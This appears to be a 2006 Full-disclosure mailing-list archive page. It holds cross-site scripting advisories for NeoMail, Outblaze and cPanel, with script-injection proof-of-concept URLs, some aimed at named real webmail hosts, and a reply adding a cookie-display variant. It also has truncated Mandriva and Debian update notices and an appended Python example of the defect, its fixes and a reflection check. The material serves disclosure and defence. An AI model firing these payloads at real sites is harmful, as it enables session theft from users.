2006.0/RPMS/OpenOffice.org-l10n-de-1.1.5-2.2.20060mdk.i586.rpm
 c0d6ba0f33ccbbd6acef1ff80d264bc7  
2006.0/RPMS/OpenOffice.org-l10n-el-1.1.5-2.2.20060mdk.i586.rpm
 b55d67c8094d82348036b3289586d284  
2006.0/RPMS/OpenOffice.org-l10n-en-1.1.5-2.2.20060mdk.i586.rpm
 49c435598a3eedad90b8e1a56e7361f2  
2006.0/RPMS/OpenOffice.org-l10n-es-1.1.5-2.2.20060mdk.i586.rpm
 51f08254141a5bbb38b0290abe16784e  
2006.0/RPMS/OpenOffice.org-l10n-et-1.1.5-2.2.20060mdk.i586.rpm
 236582a21a049e403363598e07583e33  
2006.0/RPMS/OpenOffice.org-l10n-eu-1.1.5-2.2.20060mdk.i586.rpm
 1fe921d03ae685abae102fe044b5dd4f  
2006.0/RPMS/OpenOffice.org-l10n-fi-1.1.5-2.2.20060mdk.i586.rpm
 11ff5ad3d2d98e2468b52777b0c6299b  
2006.0/RPMS/OpenOffice.org-l10n-fr-1.1.5-2.2.20060mdk.i586.rpm
 fa73e9e25532bef45ca1dba87dc5f597  
2006.0/RPMS/OpenOffice.org-l10n-he-1.1.5-2.2.20060mdk.i586.rpm
 0066e690376ab789b8ded30c808d1ccf  
2006.0/RPMS/OpenOffice.org-l10n-hu-1.1.5-2.2.20060mdk.i586.rpm
 dddb79794a203128e505b8ee4b9ed376  
2006.0/RPMS/OpenOffice.org-l10n-it-1.1.5-2.2.20060mdk.i586.rpm
 a0e81d419476a0a3a095d605f3edad8f  
2006.0/RPMS/OpenOffice.org-l10n-ja-1.1.5-2.2.20060mdk.i586.rpm
 44ed9f09bdfa364ccf32ca24f3c3681e  
2006.0/RPMS/OpenOffice.org-l10n-ko-1.1.5-2.2.20060mdk.i586.rpm
 d015a5722dbe141f41f3e62fd06fae1e  
2006.0/RPMS/OpenOffice.org-l10n-nb-1.1.5-2.2.20060mdk.i586.rpm
 350f1ae4c81f6d102d7fa725e833facd  
2006.0/RPMS/OpenOffice.org-l10n-nl-1.1.5-2.2.20060mdk.i586.rpm
 27a7fec93f39822970bd0ed4783bc415  
2006.0/RPMS/OpenOffice.org-l10n-nn-1.1.5-2.2.20060mdk.i586.rpm
 627b05bb762b52d1388bd95db921346d  
2006.0/RPMS/OpenOffice.org-l10n-ns-1.1.5-2.2.20060mdk.i586.rpm
 4ba08965b4709a449b1aeb96dc41e8ad  
2006.0/RPMS/OpenOffice.org-l10n-pl-1.1.5-2.2.20060mdk.i586.rpm
 df4ff901584a62775afd64539f40fef4  
2006.0/RPMS/OpenOffice.org-l10n-pt-1.1.5-2.2.20060mdk.i586.rpm
 5035004c9dacccb1cbaec68f0b60390c  
2006.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.5-2.2.20060mdk.i586.rpm
 a451e3a7488edb20b48d065866fc90de  
2006.0/RPMS/OpenOffice.org-l10n-ru-1.1.5-2.2.20060mdk.i586.rpm
 4520ff8f7b62aa4603d204ecbd3c60a7  
2006.0/RPMS/OpenOffice.org-l10n-sk-1.1.5-2.2.20060mdk.i586.rpm
 a9a563fb0ad8ed3084f6026698aab08b  
2006.0/RPMS/OpenOffice.org-l10n-sl-1.1.5-2.2.20060mdk.i586.rpm
 6e320635bd5c6154b3378b702861edb1  
2006.0/RPMS/OpenOffice.org-l10n-sv-1.1.5-2.2.20060mdk.i586.rpm
 ba2763e07655b6aef443a1fecd7f13eb  
2006.0/RPMS/OpenOffice.org-l10n-tr-1.1.5-2.2.20060mdk.i586.rpm
 ab7f145444e399490ef1e902b525e116  
2006.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.5-2.2.20060mdk.i586.rpm
 8f5a6e7ad4d56700624e7e77252a6e69  
2006.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.5-2.2.20060mdk.i586.rpm
 9d0ab55c3af3ed5f401ae065c8a26011  
2006.0/RPMS/OpenOffice.org-l10n-zu-1.1.5-2.2.20060mdk.i586.rpm
 a7705f07dc82b85bd7cb050ec11aec18  
2006.0/RPMS/OpenOffice.org-libs-1.1.5-2.2.20060mdk.i586.rpm
 6a6f4ab1836c36fbe6715c4141d2e99a  
2006.0/SRPMS/OpenOffice.org-1.1.5-2.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 3dee999dd248d5b405070b078bc33587  
x86_64/2006.0/RPMS/OpenOffice.org-1.1.5-2.2.20060mdk.i586.rpm
 a6e44f1c5ae79e6bff4f256b5605e1fb  
x86_64/2006.0/RPMS/OpenOffice.org-l10n-af-1.1.5-2.2.20060mdk.i586.rpm
 907f4f481bf4c12258233b78bb49e1eb  

Re: [Full-disclosure] Anyone got any security contacts at Apple?

2006-02-02 Thread xyberpix

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Thanks to everyone who responded so quickly on this, really  
appreciate it.


xyberpix

Blog: http://blogs.securiteam.com



On 2 Feb 2006, at 23:00, KF (lists) wrote:


[EMAIL PROTECTED]
-KF


Robert Carr wrote:

Is there some kind of mailing list that anyone knows of for  
updates, etc?

For instance, M$ sends out update notifications about patches.


Thanks,

Robert

Robert Carr
Desktop Support Manager
University of Kentucky Medical Center
859.323.5141
[EMAIL PROTECTED]








-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFD4pe32VKEoIQBZwkRAkPBAJoDFlqGkiXo7+OiAp3ZQNN8m6DbXQCfa3Db
iRTqoquvUcLTwjBEfJcCptc=
=p4dY
-END PGP SIGNATURE-


[Full-disclosure] Neomail Cross Site Scripting Vulnerability

2006-02-02 Thread simo
Title: Neomail Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Discovered: 24 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org

Service: Webmail Perl Client

Vendor: neomail / www.neocodesolutions.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Details:

NeoMail is a free open-source Perl web-based e-mail client that can be
installed on any UNIX mail server that is also running a web server. With
thousands of installations worldwide, NeoMail has many features, such as
sending/receiving messages with multiple attachments, inline image
attachment display, a friendly, attractive, icon-based user interface,
multiple language support (including English, Spanish, German, French,
Hungarian, Italian, Dutch, Polish, Portuguese, Norwegian, Romanian,
Russian, Slovak, and more can be added easily), configurable limits on
outgoing attachment size, folder disk usage and addressbook size, and users can
import their address book from Outlook Express or Netscape Mail in CSV
format, and more. neomail.pl is prone to cross-site scripting attacks. This
problem is due to a failure in the script to properly sanitize
user-supplied input. Input can be passed in the variable $date.

Impact:

An attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authenticated
NeoMail user in the context of the vulnerable website, resulting in the
theft of cookie-based authentication, giving the
attacker full access to the victim's NeoMail email account, as well as
other types of attacks.


Affected script with proof of concept exploit:

/neomail.pl?sessionid=-session-0.9565905&sort=date<script>alert('vul')</script>&folder&action=displayheaders&firstmessage=1

Examples:

http://www.vulnerable-site.com/neomail.pl?sessionid=-session-0.9565905&sort=date;<script>alert('vul')</script>&folder=&action=displayheaders&firstmessage=1

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.


[Full-disclosure] Outblaze Cross Site Scripting Vulnerability

2006-02-02 Thread simo
Title: outblaze Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Discovered: 23 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org

Service: Webmail manager

Vendor: outblaze / www.outblaze.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Details:

With over 40 million mailboxes under Outblaze management, Outblaze
provides enhanced messaging services to telcos, service providers, VARs,
carriers and corporations on an outsourcing basis. The core product is an
advanced email system with several available ancillary services.
The Outblaze script throw.main is prone to cross-site scripting attacks.
This problem is due to a failure in the application to properly sanitize
user-supplied input. Input can be passed in the variable $file.

Impact:

An attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authenticated Outblaze user in the
context of the vulnerable website, resulting in the theft of cookie-based
authentication and giving the attacker full access to the victim's email
account, as well as other types of attacks.


Affected script with proof of concept exploit:

/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>

Examples:

http://mymail.linuxmail.org/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>
http://www.hackermail.com/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>
http://mymail.operamail.com/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>
http://mail01.mail.com/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>
http://super.japan.com/scripts/common/throw.main?file=<BODY%20ONLOAD=alert('vul')>

screen capture:

http://www.morx.org/mailXSS.jpg

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.


[Full-disclosure] cPanel Multiple Cross Site Scripting Vulnerability

2006-02-02 Thread simo
Title: cPanel Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Discovered: 22 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org

Service: Web Hosting Manager

Vendor: cPanel

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Details:

cPanel (control panel) is a graphical web-based management tool, designed
to make administration of web sites as easy as possible. cPanel handles
all aspects of website administration in an easy-to-use interface.
The software, which is proprietary, runs on a number of popular RPM-based
Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
accessed on ports 2082 and 2083 (for an SSL version). Authentication is
either via HTTP or web page login. cPanel is prone to cross-site scripting
attacks. This problem is due to a failure in the application to properly
sanitize user-supplied input.



Impact:

An attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authenticated cPanel user in the context
of the website hosting the vulnerable cPanel version, resulting in the
theft of cookie-based authentication and giving the attacker full access to
the victim's cPanel account, as well as other types of attacks.


Affected scripts with proof of concept exploit:

http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=

http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx

http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0;<script>alert('vul')</script>

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=;<script>alert('vul')</script>

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx;<script>alert('vul')</script>&target=xxx

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006;<script>alert('vul')</script>&domain=xxx&target=xxx

http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan;<script>alert('vul')</script>&year=2006&domain=xxx&target=xxx


Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.


Re: [Full-disclosure] cPanel Multiple Cross Site Scripting Vulnerability

2006-02-02 Thread Sullo
On 3/13/2004 I notified cPanel that they had major XSS issues in their
backend... beyond what I was actually sending them or documenting, and they
should fix them. They agreed.

However, based on this, it doesn't look like they've done much in the two
years since I posted:
http://www.cirt.net/advisories/cpanel_xss.shtml

On 2/2/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Title: cPanel Multiple Cross Site Scripting
 Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
 Affected scripts with proof of concept exploit:
 http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
 http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
 http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0<script>alert('vul')</script>
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=<script>alert('vul')</script>
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx<script>alert('vul')</script>&target=xxx
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006<script>alert('vul')</script>&domain=xxx&target=xxx
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan<script>alert('vul')</script>&year=2006&domain=xxx&target=xxx

-- 
http://www.cirt.net | http://www.osvdb.org/

[Full-disclosure] [SECURITY] [DSA 964-1] New gnocatan packages fix denial of service

2006-02-02 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 964-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 3rd, 2006  http://www.debian.org/security/faq
- --

Package: gnocatan
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0467
BugTraq ID : 16429
Debian Bug : 350237

A problem has been discovered in gnocatan, the computer version of the
Settlers of Catan board game, that can lead the server and other clients
to exit via an assert, and hence does not permit the execution of
arbitrary code.  The game has been renamed to Pioneers after the
release of Debian sarge.

For the old stable distribution (woody) this problem has been fixed in
version 0.6.1-5woody3.

For the stable distribution (sarge) this problem has been fixed in
version 0.8.1.59-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.9.49-1 of pioneers.

We recommend that you upgrade your gnocatan and pioneers packages.


Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1-5woody3.dsc
  Size/MD5 checksum:  682 be4b8188f8a2a602922af5c863c0a0bf

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1-5woody3.diff.gz
  Size/MD5 checksum: 9387 2b917d4b0f655dbd19dcbdaa2d314274

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1.orig.tar.gz
  Size/MD5 checksum:   625157 a156f3fe3a50fbf91e9857a9d012e588

  Architecture independent components:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-data_0.6.1-5woody3_all.deb
  Size/MD5 checksum:22258 65de8b0cca29b0664b305eac72552c80

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-help_0.6.1-5woody3_all.deb
  Size/MD5 checksum:   264206 daf0906a288a803723843e153c040850

  Alpha architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_alpha.deb
  Size/MD5 checksum:   105258 6b8d93753ce52b310376dfbf2719496d

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_alpha.deb
  Size/MD5 checksum:92528 16d483841c95c99804798dad42723dc6

  ARM architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_arm.deb
  Size/MD5 checksum:77834 03c5081d287dc68b6f11d06d596a4ea3

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_arm.deb
  Size/MD5 checksum:68114 0cb3235a4193ccba28d6bd9a1f4745f3

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_i386.deb
  Size/MD5 checksum:75524 1d87da02eb4c1c936307af40ead41973

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_i386.deb
  Size/MD5 checksum:67428 c1527b4e2068987a66d0bf78b1f587ba

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_ia64.deb
  Size/MD5 checksum:   131080 c8fa0a1b80535052dce07750140386a0

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_ia64.deb
  Size/MD5 checksum:   118132 8648a35bb396d10177b1987562fc1049

  HP Precision architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_hppa.deb
  Size/MD5 checksum:93190 ea860fd49a0e32372ef0877f3683630f

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_hppa.deb
  Size/MD5 checksum:85118 6ad381585d1a5c59d88dd1ab346156d4

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_m68k.deb
  Size/MD5 checksum:71222 caddd4095aded1a21a1e4d53e1368468

http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_m68k.deb
  Size/MD5 checksum:63704 f3dcc0f8eb8da5e86cb5c4354a8125e7

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_mips.deb
  Size/MD5 checksum:85960 

[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability

2006-02-02 Thread Sumit Siddharth
An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Eageaction=change
Thanks
Sumit

On 2/3/06, Sullo [EMAIL PROTECTED] wrote:
 On 3/13/2004 I notified cPanel that they had major XSS issues in their
 backend... beyond what I was actually sending them or documenting, and they
 should fix them. They agreed.

 However, based on this, it doesn't look like they've done much in the two
 years since I posted:
http://www.cirt.net/advisories/cpanel_xss.shtml


 On 2/2/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 
  Title: cPanel Multiple Cross Site Scripting
  Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
  Affected scripts with proof of concept exploit:
 
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
  <script>alert('vul')</script>&domain=
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
  <script>alert('vul')</script>&domain=xxx
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
  <script>alert('vul')</script>
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
  <script>alert('vul')</script>
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
  <script>alert('vul')</script>&target=xxx
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
  <script>alert('vul')</script>&domain=xxx&target=xxx
 
 
 http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
  <script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
 

 --

 http://www.cirt.net |  http://www.osvdb.org/




--

Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in

NII Security Advisories
http://www.nii.co.in/resources/advisories.html

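The NeoMail ($date), Outblaze ($file) and cPanel (email, showtree, target) advisories above, and the webmailaging.cgi numdays parameter added in this reply, all describe one defect: a query-string value copied into the HTML response without validation or encoding. What follows is an added example and not code from any of those products or from the advisory authors. The parameter names are taken from the posts; the page templates, the sample request, the allow-list of sort columns and the numdays range are constructed here for illustration. It shows the defect beside the fix that suits each parameter type (an allow-list or integer parsing for values with a small legal set, output encoding for free text) and a reflection check a defender can keep in a regression test. It goes beyond the posts in treating the three parameter kinds generally rather than one script at a time.

```python
"""Reflected XSS from an unencoded query parameter: the defect and two
fixes. Added example, not NeoMail, Outblaze, cPanel or advisory code."""
import html
from urllib.parse import parse_qs, quote

# Constructed request modelled on the neomail.pl PoC. The "sort" value
# carries markup characters where the script expects a column name; the
# probe stands in for the advisory's script-tag payload.
SAMPLE_QUERY = ('sessionid=-session-0.9565905&sort=date<"probe">'
                '&folder=&action=displayheaders&firstmessage=1')

# Assumed legal values for the sort column (constructed, not NeoMail's).
SORT_COLUMNS = {"date", "from", "subject", "size"}


def first_param(query: str, name: str) -> str:
    """Return the first value of `name` from a query string ('' if absent)."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_sort_link_vulnerable(query: str) -> str:
    """The defect the advisories describe: the raw parameter is
    interpolated into both an attribute and the text of the page."""
    sort = first_param(query, "sort")
    return f'<a href="neomail.pl?sort={sort}">Sorted by {sort}</a>'


def render_sort_link_fixed(query: str) -> str:
    """Fix for an enumerated parameter: reject anything outside the
    allow-list, then encode for each context the value lands in
    (percent-encoding inside the URL attribute, HTML escaping in text)."""
    sort = first_param(query, "sort")
    if sort not in SORT_COLUMNS:
        sort = "date"  # unknown column: fall back, never echo the input
    return (f'<a href="neomail.pl?sort={quote(sort, safe="")}">'
            f'Sorted by {html.escape(sort, quote=True)}</a>')


def render_free_text_fixed(value: str) -> str:
    """Fix for free-form input such as the advisories' email or file
    values, where no allow-list fits: HTML-escape at the point of output.
    quote=True also neutralises the attribute-breaking characters " and '."""
    return f"<p>You entered: {html.escape(value, quote=True)}</p>"


def numdays_param(query: str, default: int = 30) -> int:
    """Fix for a numeric parameter like the numdays value in this reply:
    parse it to an int and range-check it, so markup can never reach
    the page. The 1..365 range is an assumption for the example."""
    try:
        n = int(first_param(query, "numdays"))
    except ValueError:
        return default
    return n if 1 <= n <= 365 else default


def reflects_unescaped(body: str, probe: str = '<"probe">') -> bool:
    """Defender-side check for a scanner or regression test: does the
    response still contain the markup characters that were sent, verbatim?
    True means the parameter is reflected without encoding."""
    return probe in body


if __name__ == "__main__":
    print("vulnerable reflects probe:",
          reflects_unescaped(render_sort_link_vulnerable(SAMPLE_QUERY)))
    print("fixed reflects probe:",
          reflects_unescaped(render_sort_link_fixed(SAMPLE_QUERY)))
    print(render_free_text_fixed('<"probe">'))
    print("numdays:", numdays_param("numdays=abc&ageaction=change"))
```

The allow-list is the stronger control where it applies, because it removes the question of encoding entirely for that parameter; output encoding remains necessary wherever user text legitimately has to appear in the page, and it has to match the context (attribute, text, URL) the value is written into.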